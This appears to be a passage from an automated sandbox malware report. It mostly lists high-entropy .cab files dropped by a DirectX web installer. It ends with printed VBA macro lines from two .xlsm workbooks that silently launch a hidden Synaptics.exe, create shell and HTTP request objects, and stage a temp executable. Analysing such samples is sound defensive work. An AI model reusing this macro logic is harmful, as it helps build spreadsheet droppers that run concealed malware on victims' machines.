Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS452153.tmp\Apr2007_d3dx10_33_x86.cab entropy: 7.99896802841
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx10_33_x86.cab entropy: 7.99896802841
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Apr2007_xact_x64.cab entropy: 7.99671826657
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\SysWOW64\directx\websetup\Apr2007_xact_x86.cab entropy: 7.99449196682
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Windows\msdownld.tmp\AS46B9B6.tmp\Apr2007_xact_x86.cab entropy: 7.99449196682
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\APR2007_XACT_x86[1].cab entropy: 7.99449196682
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx10_33_x64.cab entropy: 7.99956097649Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B273.tmp\Apr2007_d3dx10_33_x64.cab entropy: 7.99956097649Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2007_d3dx10_33_x64[1].cab entropy: 7.99956097649Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx9_33_x64.cab entropy: 7.99980407083Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A89F.tmp\Apr2007_d3dx9_33_x64.cab entropy: 7.99980407083Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46BF54.tmp\Apr2007_xact_x64.cab entropy: 7.99671826657Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\APR2007_XACT_x64[1].cab entropy: 7.99671826657Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46DD5B.tmp\Jun2007_xact_x64.cab entropy: 7.99632463398Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JUN2007_XACT_x64[1].cab entropy: 7.99632463398Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46D685.tmp\Jun2007_xact_x86.cab entropy: 7.99490970306Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\JUN2007_XACT_x86[1].cab entropy: 7.99490970306Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx10_34_x64.cab entropy: 7.99954275121Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46CF03.tmp\Jun2007_d3dx10_34_x64.cab entropy: 7.99954275121Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Jun2007_d3dx10_34_x64[1].cab entropy: 7.99954275121Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx9_34_x64.cab entropy: 7.99979539491Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46C53F.tmp\Jun2007_d3dx9_34_x64.cab entropy: 7.99979539491Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2007_d3dx9_34_x64[1].cab entropy: 7.99979539491Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_xact_x86.cab entropy: 7.99490970306Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2007_d3dx10_34_x86[1].cab entropy: 7.9989902264Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4532A9.tmp\Jun2007_d3dx10_34_x86.cab entropy: 7.9989902264Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_xact_x64.cab entropy: 7.99632463398Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2007_d3dx10_34_x86.cab entropy: 7.9989902264Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Aug2007_d3dx9_35_x86[1].cab entropy: 7.9991869164Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4539AE.tmp\Aug2007_d3dx9_35_x86.cab entropy: 7.9991869164Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx9_35_x86.cab entropy: 7.9991869164Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2007_d3dx10_35_x86[1].cab entropy: 7.9986813742Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4543EF.tmp\Aug2007_d3dx10_35_x86.cab entropy: 7.9986813742Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx10_35_x86.cab entropy: 7.9986813742Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Nov2007_d3dx9_36_x86[1].cab entropy: 7.99907865291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS454B80.tmp\Nov2007_d3dx9_36_x86.cab entropy: 7.99907865291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx9_36_x86.cab entropy: 7.99907865291Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Nov2007_d3dx10_36_x86[1].cab entropy: 7.99885807363Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4555B1.tmp\Nov2007_d3dx10_36_x86.cab entropy: 7.99885807363Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx10_36_x86.cab entropy: 7.99885807363Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Mar2008_d3dx9_37_x86[1].cab entropy: 7.99972380205Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS455D62.tmp\Mar2008_d3dx9_37_x86.cab entropy: 7.99972380205Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx9_37_x86.cab entropy: 7.99972380205Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Mar2008_d3dx10_37_x86[1].cab entropy: 7.99894945695Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4566A9.tmp\Mar2008_d3dx10_37_x86.cab entropy: 7.99894945695Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx10_37_x86.cab entropy: 7.99894945695Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Jun2008_d3dx9_38_x86[1].cab entropy: 7.99972642235Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS456E3B.tmp\Jun2008_d3dx9_38_x86.cab entropy: 7.99972642235Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx9_38_x86.cab entropy: 7.99972642235Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Jun2008_d3dx10_38_x86[1].cab entropy: 7.99898013077Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4577C0.tmp\Jun2008_d3dx10_38_x86.cab entropy: 7.99898013077Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2008_d3dx10_38_x86.cab entropy: 7.99898013077Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Aug2008_d3dx9_39_x86[1].cab entropy: 7.9996829971Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS457F71.tmp\Aug2008_d3dx9_39_x86.cab entropy: 7.9996829971Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx9_39_x86.cab entropy: 7.9996829971Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2008_d3dx10_39_x86[1].cab entropy: 7.99888618458Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS458925.tmp\Aug2008_d3dx10_39_x86.cab entropy: 7.99888618458Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx10_39_x86.cab entropy: 7.99888618458Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Nov2008_d3dx9_40_x86[1].cab entropy: 7.99964527898Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS459098.tmp\Nov2008_d3dx9_40_x86.cab entropy: 7.99964527898Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx9_40_x86.cab entropy: 7.99964527898Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Nov2008_d3dx10_40_x86[1].cab entropy: 7.99901184706Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS459A9A.tmp\Nov2008_d3dx10_40_x86.cab entropy: 7.99901184706Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx10_40_x86.cab entropy: 7.99901184706Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Mar2009_d3dx9_41_x86[1].cab entropy: 7.99977242309Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45A25A.tmp\Mar2009_d3dx9_41_x86.cab entropy: 7.99977242309Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx9_41_x86.cab entropy: 7.99977242309Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Mar2009_d3dx10_41_x86[1].cab entropy: 7.99875716031Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45AC2E.tmp\Mar2009_d3dx10_41_x86.cab entropy: 7.99875716031Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx10_41_x86.cab entropy: 7.99875716031Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2009_d3dx9_42_x86[1].cab entropy: 7.99947517428Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45B47B.tmp\Aug2009_d3dx9_42_x86.cab entropy: 7.99947517428Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx9_42_x86.cab entropy: 7.99947517428Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Aug2009_d3dx10_42_x86[1].cab entropy: 7.99617858979Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45BBCE.tmp\Aug2009_d3dx10_42_x86.cab entropy: 7.99617858979Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx10_42_x86.cab entropy: 7.99617858979Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Aug2009_d3dx11_42_x86[1].cab entropy: 7.99133262696Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45C17B.tmp\Aug2009_d3dx11_42_x86.cab entropy: 7.99133262696Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx11_42_x86.cab entropy: 7.99133262696Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Aug2009_d3dcsx_42_x86[1].cab entropy: 7.99929609474Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\dxupdate[1].cab entropy: 7.99005571784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4431D3.tmp\dxupdate.cab entropy: 7.99005571784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\dxupdate.cab entropy: 7.99005571784Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Dec2006_d3dx10_00_x86[1].cab entropy: 7.99660427625Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44AABC.tmp\Dec2006_d3dx10_00_x86.cab entropy: 7.99660427625Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x86.cab entropy: 7.99660427625Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Dec2006_d3dx10_00_x64[1].cab entropy: 7.99694629492Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44B115.tmp\Dec2006_d3dx10_00_x64.cab entropy: 7.99694629492Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x64.cab entropy: 7.99694629492Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Feb2005_d3dx9_24_x86[1].cab entropy: 7.99897272471Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44C633.tmp\Feb2005_d3dx9_24_x86.cab entropy: 7.99897272471Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2005_d3dx9_24_x86.cab entropy: 7.99897272471Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2005_d3dx9_25_x86[1].cab entropy: 7.99907513517Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44CEBF.tmp\Apr2005_d3dx9_25_x86.cab entropy: 7.99907513517Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2005_d3dx9_25_x86.cab entropy: 7.99907513517Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Jun2005_d3dx9_26_x86[1].cab entropy: 7.99904021782Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44D7E6.tmp\Jun2005_d3dx9_26_x86.cab entropy: 7.99904021782Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Jun2005_d3dx9_26_x86.cab entropy: 7.99904021782Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Aug2005_d3dx9_27_x86[1].cab entropy: 7.99913898215Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44E014.tmp\Aug2005_d3dx9_27_x86.cab entropy: 7.99913898215Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Aug2005_d3dx9_27_x86.cab entropy: 7.99913898215Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Dec2005_d3dx9_28_x86[1].cab entropy: 7.99912186515Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44E851.tmp\Dec2005_d3dx9_28_x86.cab entropy: 7.99912186515Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2005_d3dx9_28_x86.cab entropy: 7.99912186515Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Feb2006_d3dx9_29_x86[1].cab entropy: 7.99922866964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44F0FC.tmp\Feb2006_d3dx9_29_x86.cab entropy: 7.99922866964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Feb2006_d3dx9_29_x86.cab entropy: 7.99922866964Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Apr2006_d3dx9_30_x86[1].cab entropy: 7.99905051808Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44F9C6.tmp\Apr2006_d3dx9_30_x86.cab entropy: 7.99905051808Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2006_d3dx9_30_x86.cab entropy: 7.99905051808Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\OCT2006_d3dx9_31_x86[1].cab entropy: 7.99908172452Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4504E2.tmp\Oct2006_d3dx9_31_x86.cab entropy: 7.99908172452Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Oct2006_d3dx9_31_x86.cab entropy: 7.99908172452Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\DEC2006_d3dx9_32_x86[1].cab entropy: 7.99909224767Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS450DAC.tmp\Dec2006_d3dx9_32_x86.cab entropy: 7.99909224767Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx9_32_x86.cab entropy: 7.99909224767Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Apr2007_d3dx9_33_x86[1].cab entropy: 7.99928426182Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS451741.tmp\Apr2007_d3dx9_33_x86.cab entropy: 7.99928426182Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\Apr2007_d3dx9_33_x86.cab entropy: 7.99928426182Jump to dropped file

                          System Summary

                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
